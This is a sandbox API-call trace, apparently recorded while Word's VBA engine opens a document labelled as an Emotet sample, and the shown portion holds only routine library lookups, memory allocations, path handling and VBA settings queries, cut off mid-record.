0x7fefd4c2640 [0067.494] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDecFromI4") returned 0x7fefd4a58a0 [0067.494] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDecFromCy") returned 0x7fefd4a5820 [0067.494] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarR4FromDec") returned 0x7fefd4baf20 [0067.495] GetProcAddress (hModule=0x7fefd480000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7fefd4da0c0 [0067.495] GetProcAddress (hModule=0x7fefd480000, lpProcName="GetRecordInfoFromGuids") returned 0x7fefd512160 [0067.496] GetProcAddress (hModule=0x7fefd480000, lpProcName="SafeArrayGetRecordInfo") returned 0x7fefd4a5af0 [0067.496] GetProcAddress (hModule=0x7fefd480000, lpProcName="SafeArraySetRecordInfo") returned 0x7fefd4a5a90 [0067.496] GetProcAddress (hModule=0x7fefd480000, lpProcName="SafeArrayGetIID") returned 0x7fefd4a5a60 [0067.497] GetProcAddress (hModule=0x7fefd480000, lpProcName="SafeArraySetIID") returned 0x7fefd4a5a30 [0067.497] GetProcAddress (hModule=0x7fefd480000, lpProcName="SafeArrayCopyData") returned 0x7fefd4860b0 [0067.497] GetProcAddress (hModule=0x7fefd480000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7fefd483e90 [0067.498] GetProcAddress (hModule=0x7fefd480000, lpProcName="SafeArrayCreateEx") returned 0x7fefd4d9f80 [0067.498] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarFormat") returned 0x7fefd509b20 [0067.498] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarFormatDateTime") returned 0x7fefd509aa0 [0067.499] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarFormatNumber") returned 0x7fefd509990 [0067.499] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarFormatPercent") returned 0x7fefd509890 [0067.500] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarFormatCurrency") returned 0x7fefd509770 [0067.500] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarWeekdayName") returned 0x7fefd4eb8d0 [0067.500] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarMonthName") returned 0x7fefd4eb800 [0067.501] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarAdd") returned 0x7fefd5048e0 [0067.501] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarAnd") returned 0x7fefd509470 [0067.501] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarCat") returned 0x7fefd5096a0 [0067.502] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDiv") returned 0x7fefd502fe0 [0067.502] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarEqv") returned 0x7fefd509cf0 [0067.502] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarIdiv") returned 0x7fefd508ff0 [0067.503] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarImp") returned 0x7fefd509c00 [0067.503] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarMod") returned 0x7fefd508e60 [0067.504] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarMul") returned 0x7fefd503690 [0067.506] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarOr") returned 0x7fefd5092d0 [0067.506] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarPow") returned 0x7fefd502e80 [0067.507] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarSub") returned 0x7fefd503f90 [0067.507] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarXor") returned 0x7fefd5091a0 [0067.507] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarAbs") returned 0x7fefd4e7c30 [0067.508] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarFix") returned 0x7fefd4e7a60 [0067.508] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarInt") returned 0x7fefd4e7890 [0067.509] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarNeg") returned 0x7fefd4e7ea0 [0067.509] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarNot") returned 0x7fefd509600 [0067.509] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarRound") returned 0x7fefd4e76a0 [0067.510] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarCmp") returned 0x7fefd5083f0 [0067.510] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDecAdd") returned 0x7fefd4b3070 [0067.510] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDecCmp") returned 0x7fefd4bd700 [0067.511] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarBstrCat") returned 0x7fefd4bd890 [0067.511] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarCyMulI4") returned 0x7fefd49caf0 [0067.512] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarBstrCmp") returned 0x7fefd4a8a00 [0067.513] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x6860f10 [0067.513] GetUserDefaultLCID () returned 0x409 [0067.528] IMalloc:Alloc (This=0x7fefec05380, cb=0x3c) returned 0x68d8d80 [0067.528] IMalloc:Alloc (This=0x7fefec05380, cb=0x38) returned 0x68bf850 [0067.528] IMalloc:Alloc (This=0x7fefec05380, cb=0x20000*=0x78746341) returned 0xaee0080 [0067.530] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x6860ee0 [0067.531] IMalloc:Alloc (This=0x7fefec05380, cb=0x7d8) returned 0xaf00090 [0067.532] IMalloc:Alloc (This=0x7fefec05380, cb=0x98) returned 0x6a08c40 [0067.532] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x6860d00 [0067.533] IMalloc:Alloc (This=0x7fefec05380, cb=0x28) returned 0x6860d90 [0067.598] malloc (_Size=0xc8) returned 0x2fccef0 [0067.610] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpString2="") returned 1 [0067.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=-1, lpMultiByteStr=0x147ad0, cbMultiByte=247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 124 [0067.611] lstrlenA (lpString="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 123 [0067.611] lstrcpyA (in: lpString1=0x2fccfc0, lpString2="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" [0067.611] SetCursor (hCursor=0x10007) returned 0x10007 [0067.611] malloc (_Size=0x3f0) returned 0x2fcd0e0 [0067.611] malloc (_Size=0x60) returned 0x2fcd600 [0067.611] GetCurrentThreadId () returned 0x8ec [0067.611] GetCurrentThreadId () returned 0x8ec [0067.611] malloc (_Size=0x20) returned 0x2fcd670 [0067.611] malloc (_Size=0x818) returned 0x2fcd6a0 [0067.612] malloc (_Size=0x818) returned 0x2517a30 [0067.612] malloc (_Size=0x28) returned 0x2fcdec0 [0067.612] malloc (_Size=0x60) returned 0x2fcdef0 [0067.612] malloc (_Size=0xa8) returned 0x2518250 [0067.612] IMalloc:Alloc (This=0x7fefec05380, cb=0x4) returned 0x6a58e20 [0067.612] IMalloc:Alloc (This=0x7fefec05380, cb=0xf0) returned 0x6a00b60 [0067.612] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0x6a636b0 [0067.612] IMalloc:Alloc (This=0x7fefec05380, cb=0x280) returned 0x6a6dfa0 [0067.613] IMalloc:Alloc (This=0x7fefec05380, cb=0xa08) returned 0x696e640 [0067.613] IMalloc:Alloc (This=0x7fefec05380, cb=0x1738) returned 0xaf05ca0 [0067.613] GetLocalTime (in: lpSystemTime=0x1472d8 | out: lpSystemTime=0x1472d8*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x4, wMilliseconds=0x324)) [0067.613] _ultow_s (in: _Value=0x5e95ca90, _Buffer=0x6a6dfca, _BufferCount=0x103, _Radix=16 | out: _Buffer="5e95ca90") returned 0x0 [0067.613] wcsncpy_s (in: _Destination=0x146fa0, _SizeInWords=0x108, _Source="*\\Z005e95ca90", _MaxCount=0x106 | out: _Destination="*\\Z005e95ca90") returned 0x0 [0067.613] CharLowerBuffW (in: lpsz="*\\Z005e95ca90", cchLength=0xd | out: lpsz="*\\z005e95ca90") returned 0xd [0067.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005e95ca90", cchWideChar=14, lpMultiByteStr=0x146ed0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005e95ca90", lpUsedDefaultChar=0x0) returned 14 [0067.613] wcscpy_s (in: _Destination=0x6a636d0, _SizeInWords=0xe, _Source="*\\Z005e95ca90" | out: _Destination="*\\Z005e95ca90") returned 0x0 [0067.613] wcsncpy_s (in: _Destination=0x146fe0, _SizeInWords=0x108, _Source="*\\Z005e95ca90", _MaxCount=0x106 | out: _Destination="*\\Z005e95ca90") returned 0x0 [0067.613] CharLowerBuffW (in: lpsz="*\\Z005e95ca90", cchLength=0xd | out: lpsz="*\\z005e95ca90") returned 0xd [0067.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005e95ca90", cchWideChar=14, lpMultiByteStr=0x146f10, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005e95ca90", lpUsedDefaultChar=0x0) returned 14 [0067.613] lstrcpyA (in: lpString1=0x2fcd050, lpString2="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" [0067.614] lstrcpyA (in: lpString1=0x2fcd050, lpString2="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" [0067.614] lstrcpyA (in: lpString1=0x2fcd050, lpString2="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" [0067.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2fcd050, cbMultiByte=-1, lpWideCharStr=0x1478b0, cchWideChar=124 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 124 [0067.614] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0067.614] wcscpy_s (in: _Destination=0x147656, _SizeInWords=0x105, _Source="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" | out: _Destination="C:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.614] wcsncpy_s (in: _Destination=0x147270, _SizeInWords=0x108, _Source="*\\Z005e95ca90", _MaxCount=0x106 | out: _Destination="*\\Z005e95ca90") returned 0x0 [0067.614] CharLowerBuffW (in: lpsz="*\\Z005e95ca90", cchLength=0xd | out: lpsz="*\\z005e95ca90") returned 0xd [0067.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005e95ca90", cchWideChar=14, lpMultiByteStr=0x1471a0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005e95ca90", lpUsedDefaultChar=0x0) returned 14 [0067.614] _wcsicmp (_String1="*\\Z005e95ca90", _String2="*\\Z005e95ca90") returned 0 [0067.614] wcsncpy_s (in: _Destination=0x147270, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.614] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.614] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0x6911260 [0067.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0x6911260, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.614] IMalloc:Free (This=0x7fefec05380, pv=0x6911260) [0067.614] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a636b0, cb=0x180) returned 0x6943fc0 [0067.614] wcscpy_s (in: _Destination=0x6944000, _SizeInWords=0x7f, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.614] wcsncpy_s (in: _Destination=0x147270, _SizeInWords=0x108, _Source="*\\Z005e95ca90", _MaxCount=0x106 | out: _Destination="*\\Z005e95ca90") returned 0x0 [0067.614] CharLowerBuffW (in: lpsz="*\\Z005e95ca90", cchLength=0xd | out: lpsz="*\\z005e95ca90") returned 0xd [0067.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005e95ca90", cchWideChar=14, lpMultiByteStr=0x1471a0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005e95ca90", lpUsedDefaultChar=0x0) returned 14 [0067.614] _wcsicmp (_String1="*\\Z005e95ca90", _String2="*\\Z005e95ca90") returned 0 [0067.614] wcsncpy_s (in: _Destination=0x1472b0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.614] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.614] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0x6911260 [0067.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0x6911260, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.614] IMalloc:Free (This=0x7fefec05380, pv=0x6911260) [0067.614] wcscpy_s (in: _Destination=0x6a6dfc0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.614] CExposedDocFile::AddRef () returned 0x2 [0067.614] CExposedDocFile::OpenStorage () returned 0x0 [0067.615] CExposedDocFile::AddRef () returned 0x2 [0067.615] IMalloc:Alloc (This=0x7fefec05380, cb=0x84) returned 0x6a636b0 [0067.615] wcscpy_s (in: _Destination=0x6a63720, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0067.615] wcscpy_s (in: _Destination=0x146b50, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0067.615] _ltow_s (in: _Value=0, _Buffer=0x146b5c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0067.615] CExposedDocFile::OpenStream () returned 0x0 [0067.615] IMalloc:Alloc (This=0x7fefec05380, cb=0x420) returned 0x69f9090 [0067.615] CExposedStream::AddRef () returned 0x2 [0067.615] CExposedStream::Release () returned 0x1 [0067.615] CExposedStream::Read () returned 0x0 [0067.616] CExposedStream::Seek () returned 0x0 [0067.616] CExposedStream::Release () returned 0x0 [0067.616] IMalloc:Free (This=0x7fefec05380, pv=0x69f9090) [0067.616] IMalloc:Free (This=0x7fefec05380, pv=0x6a636b0) [0067.616] longjmp () [0067.621] IMalloc:Alloc (This=0x7fefec05380, cb=0x84) returned 0x6a636b0 [0067.621] wcscpy_s (in: _Destination=0x6a63720, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0067.621] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x180) returned 0x6944150 [0067.621] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf01fd0 [0067.621] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf01f10 [0067.621] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a16ba0 [0067.621] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x80) returned 0x6a64790 [0067.621] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a16df0 [0067.621] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a17040 [0067.621] IMalloc:Alloc (This=0x7fefec05380, cb=0x28) returned 0x6884400 [0067.622] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x6876aa0 [0067.622] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x146b4c, cchData=6 | out: lpLCData="1252") returned 5 [0067.622] atoi (_Str="1252") returned 1252 [0067.622] GetLocalTime (in: lpSystemTime=0x146b40 | out: lpSystemTime=0x146b40*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x4, wMilliseconds=0x324)) [0067.622] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0x6a64820 [0067.622] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58e30 [0067.622] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0x6a648b0 [0067.622] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x6884b50 [0067.622] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0x6a64940 [0067.622] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a64940, cb=0x280) returned 0x6a6e230 [0067.622] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58da0 [0067.622] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58e60 [0067.623] strcpy_s (in: _Dst=0x146920, _DstSize=0xc8, _Src="Software\\Microsoft\\VBA\\" | out: _Dst="Software\\Microsoft\\VBA\\") returned 0x0 [0067.623] strcat_s (in: _Destination="Software\\Microsoft\\VBA\\", _SizeInBytes=0xc8, _Source="7.1\\Common" | out: _Destination="Software\\Microsoft\\VBA\\7.1\\Common") returned 0x0 [0067.623] RegCreateKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x7fee3b604a8, lpdwDisposition=0x0 | out: phkResult=0x7fee3b604a8*=0xa20, lpdwDisposition=0x0) returned 0x0 [0067.623] RegQueryValueExA (in: hKey=0xa20, lpValueName="RequireDeclaration", lpReserved=0x0, lpType=0x1469f8, lpData=0x1469f0, lpcbData=0x1469f4*=0x4 | out: lpType=0x1469f8*=0x0, lpData=0x1469f0*=0x18, lpcbData=0x1469f4*=0x4) returned 0x2 [0067.623] RegQueryValueExA (in: hKey=0xa20, lpValueName="CompileOnDemand", lpReserved=0x0, lpType=0x1469f8, lpData=0x1469f0, lpcbData=0x1469f4*=0x4 | out: lpType=0x1469f8*=0x0, lpData=0x1469f0*=0x0, lpcbData=0x1469f4*=0x4) returned 0x2 [0067.623] RegQueryValueExA (in: hKey=0xa20, lpValueName="NotifyUserBeforeStateLoss", lpReserved=0x0, lpType=0x1469f8, lpData=0x1469f0, lpcbData=0x1469f4*=0x4 | out: lpType=0x1469f8*=0x0, lpData=0x1469f0*=0x1, lpcbData=0x1469f4*=0x4) returned 0x2 [0067.623] RegQueryValueExA (in: hKey=0xa20, lpValueName="BackGroundCompile", lpReserved=0x0, lpType=0x1469f8, lpData=0x1469f0, lpcbData=0x1469f4*=0x4 | out: lpType=0x1469f8*=0x0, lpData=0x1469f0*=0x0, lpcbData=0x1469f4*=0x4) returned 0x2 [0067.623] RegQueryValueExA (in: hKey=0xa20, lpValueName="BreakOnAllErrors", lpReserved=0x0, lpType=0x1469f8, lpData=0x1469f0, lpcbData=0x1469f4*=0x4 | out: lpType=0x1469f8*=0x0, lpData=0x1469f0*=0xff, lpcbData=0x1469f4*=0x4) returned 0x2 [0067.623] RegQueryValueExA (in: hKey=0xa20, lpValueName="BreakOnServerErrors", lpReserved=0x0, lpType=0x1469f8, lpData=0x1469f0, lpcbData=0x1469f4*=0x4 | out: lpType=0x1469f8*=0x0, lpData=0x1469f0*=0x0, lpcbData=0x1469f4*=0x4) returned 0x2 [0067.623] RegCloseKey (hKey=0xa20) returned 0x0 [0067.624] IMalloc:Alloc (This=0x7fefec05380, cb=0xc0) returned 0x6822b40 [0067.624] IMalloc:Alloc (This=0x7fefec05380, cb=0xc0) returned 0x68231c0 [0067.624] IMalloc:Alloc (This=0x7fefec05380, cb=0x1300) returned 0xaf073e0 [0067.624] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e00000 [0067.625] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x30c0000 [0067.625] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0067.626] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x30) returned 0x646e8b0 [0067.626] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e10000 [0067.626] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0067.626] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e20000 [0067.627] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3350000 [0067.627] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3380000 [0067.627] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Intrinsics") returned 0x109464 [0067.632] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x34b0000 [0067.632] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0067.632] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="") returned 0x10c0b3 [0067.632] CExposedDocFile::OpenStream () returned 0x0 [0067.633] IMalloc:Alloc (This=0x7fefec05380, cb=0x420) returned 0x69f9090 [0067.633] CExposedStream::AddRef () returned 0x2 [0067.633] CExposedStream::Release () returned 0x1 [0067.633] CExposedStream::Read () returned 0x0 [0067.634] GetProcAddress (hModule=0x7fee2ce0000, lpProcName=0x7fee3b2b088) returned 0x7fee2cefcd0 [0067.634] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x34c0000 [0067.634] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x3500000 [0067.635] CExposedDocFile::CreateStream () returned 0x0 [0067.635] IMalloc:Alloc (This=0x7fefec05380, cb=0x420) returned 0x69f94e0 [0067.635] CExposedStream::AddRef () returned 0x2 [0067.635] CExposedStream::Release () returned 0x1 [0067.635] CExposedStream::Release () returned 0x0 [0067.635] IMalloc:Free (This=0x7fefec05380, pv=0x69f94e0) [0067.635] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0067.635] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x30) returned 0x646e870 [0067.635] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x34d0000 [0067.635] VirtualAlloc (lpAddress=0x3500000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3500000 [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0067.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 